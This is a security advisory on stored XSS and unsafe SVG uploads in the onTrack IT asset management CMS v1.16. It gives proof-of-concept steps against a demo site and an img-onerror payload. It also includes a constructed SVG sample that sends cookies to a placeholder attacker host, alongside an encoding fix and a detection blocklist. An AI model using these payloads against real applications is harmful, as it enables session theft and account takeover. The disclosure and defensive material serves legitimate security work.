onTrack - IT Asset Management & Project Management CMS v1.16 Stored XSS

2019.04.16
QUIXSS (RU)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

«onTrack - IT Asset Management & Project Management» performs no filtering or output encoding on its input fields, so the application contains multiple stored XSS issues: whatever an authenticated user saves in a field is later rendered unescaped to anyone who views that record.

PoC:

1. Go to the demo website http://demos.codeniner.com/ontrack/?route=signin and log in as admin.
2. Open any section you like, e.g. «Clients», «Inventory», «Projects», «Knowledge Base», etc.
3. Enter a payload in any input field and save the record. Any input field you can find inside this system is vulnerable, so any payload will do, e.g.:

"><img src="x" onerror="alert('cxsecurity');">

The script runs when the saved record is displayed.

In addition, .SVG file uploads are allowed, so you can upload an «evil» .SVG with a cookie stealer inside, for example.
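To make the two issues concrete, the following is an added illustration (not code from onTrack; the product's templates are not shown on this page) of how the payload above breaks out of a double-quoted attribute when a stored field value is echoed without encoding, how HTML entity encoding at output time neutralises it, and a blocklist check that would flag the kind of «evil» .SVG the advisory mentions. The input template, the sample SVG files and the attacker host `attacker.example` are constructed for this example.

```javascript
// Added illustration, not code from onTrack: stored-XSS attribute break-out
// versus output encoding, plus a check for script-bearing SVG uploads.

// Payload quoted in the advisory.
const PAYLOAD = '"><img src="x" onerror="alert(\'cxsecurity\');">';

// Assumed vulnerable pattern: a stored field value is interpolated straight
// into a double-quoted attribute (onTrack's real template is not on the page).
function renderUnescaped(value) {
  return `<input type="text" name="client_name" value="${value}">`;
}

// Entity-encode the five characters that matter in HTML text and
// double-quoted attribute contexts.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened form: same template, value encoded at output time.
function renderEscaped(value) {
  return `<input type="text" name="client_name" value="${escapeHtml(value)}">`;
}

// List the element names a browser would see in a fragment. A raw '<' can only
// start a tag, so this shows whether the payload produced a second element.
function elementNames(html) {
  return Array.from(html.matchAll(/<([a-zA-Z][a-zA-Z0-9]*)/g), (m) => m[1].toLowerCase());
}

// Blocklist check for uploaded SVG: script elements, on* event handlers,
// javascript: URLs and foreignObject (which can embed arbitrary HTML).
const SVG_DANGEROUS = [
  /<\s*script\b/i,
  /\son[a-z]+\s*=/i,
  /javascript\s*:/i,
  /<\s*foreignObject\b/i,
];
function svgIsDangerous(svgText) {
  return SVG_DANGEROUS.some((re) => re.test(svgText));
}

// Constructed samples: a cookie-exfiltrating SVG of the kind the advisory
// describes (attacker.example is a placeholder host) and a harmless one.
const EVIL_SVG =
  '<svg xmlns="http://www.w3.org/2000/svg" ' +
  'onload="fetch(\'https://attacker.example/?c=\' + document.cookie)"></svg>';
const BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>';

// Summarise what each rendering produces and what the SVG check says.
function demo() {
  return {
    unescapedElements: elementNames(renderUnescaped(PAYLOAD)), // ['input', 'img']
    escapedElements: elementNames(renderEscaped(PAYLOAD)),     // ['input']
    evilSvgFlagged: svgIsDangerous(EVIL_SVG),                  // true
    benignSvgFlagged: svgIsDangerous(BENIGN_SVG),              // false
  };
}
```

The regex blocklist is only a detection illustration and is bypassable (and will false-positive on text such as `on x=`). The robust handling for user-supplied SVG is to never serve it inline from the application origin (force `Content-Disposition: attachment`, or serve uploads from a separate sandboxed origin) or to sanitise it with a real XML parser that strips script elements and event attributes; for the stored XSS itself, the fix is context-aware output encoding of every echoed field, as in renderEscaped.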

References:

https://codecanyon.net/item/ontrack-it-asset-management-project-management/14772352



Copyright 2019, cxsecurity.com
